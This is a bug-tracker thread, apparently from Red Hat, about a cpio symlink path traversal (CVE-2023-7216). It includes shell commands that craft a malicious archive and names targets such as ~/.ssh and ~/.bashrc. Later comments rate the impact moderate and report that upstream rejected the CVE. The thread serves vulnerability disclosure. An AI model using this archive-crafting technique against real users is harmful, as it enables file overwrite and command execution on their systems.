Summary: CPIO found to be vulnerable to Path Traversal vulnerability that can be leveraged to achieve full Remote Command Execution on the target. Details: While handling CPIO archives, the CPIO follows symlink, cpio by default will follow stored symlinks while extracting and the Archiver will not check the symlink location, which leads to arbitrary file writes to unintended locations. When the victim extracts the archive, the attacker can craft a malicious cpio archive to achieve RCE on the target system. PoC ( Steps to reproduce ) : Complete instructions to craft a cpio archive to demonstrate the vulnerability. ``` mkdir testcpio ln -sf /tmp/ testcpio/tmp echo "TEST Traversal" > testcpio/tmpYtrav.txt cd testcpio/ ls | cpio -ov > ../trav.cpio cd ../ sed -i s/"tmpY"/"tmp\/"/g trav.cpio ``` Extract the malicious archive: cpio -i < trav.cpio Impact: An attacker can craft malicious cpio archives that exploit the vulnerability to write files on locations such as ~/.ssh, ~/.bashrc, ~/.config/autostart/ etc., to achieve full remote command execution on the target/victim system. Software that uses CPIO as a component might be vulnerable. Credit: Febin Mon Saji
This attack requires to social engineer the user to open the cpio archive, impact of this is moderate.
*** Bug 2255243 has been marked as a duplicate of this bug. ***
Looks very similar to CVE-2015-1197 - https://bugzilla.redhat.com/show_bug.cgi?id=1179773
There is a question in upstream list about this CVE in https://lists.gnu.org/archive/html/bug- cpio/2024-02/msg00000.html
Marian, can you help with this question? Corrected link is https://lists.gnu.org/archive/html/bug-cpio/2024-02/msg00000.html
https://lists.gnu.org/archive/html/bug-cpio/2024-03/msg00000.html CVE-2023-7216 has been rejected by the upstream community , cpio maintainer don't think it's a bug. Is the Red Hat community considering marking CVE-2023-7216 as rejected on NVD?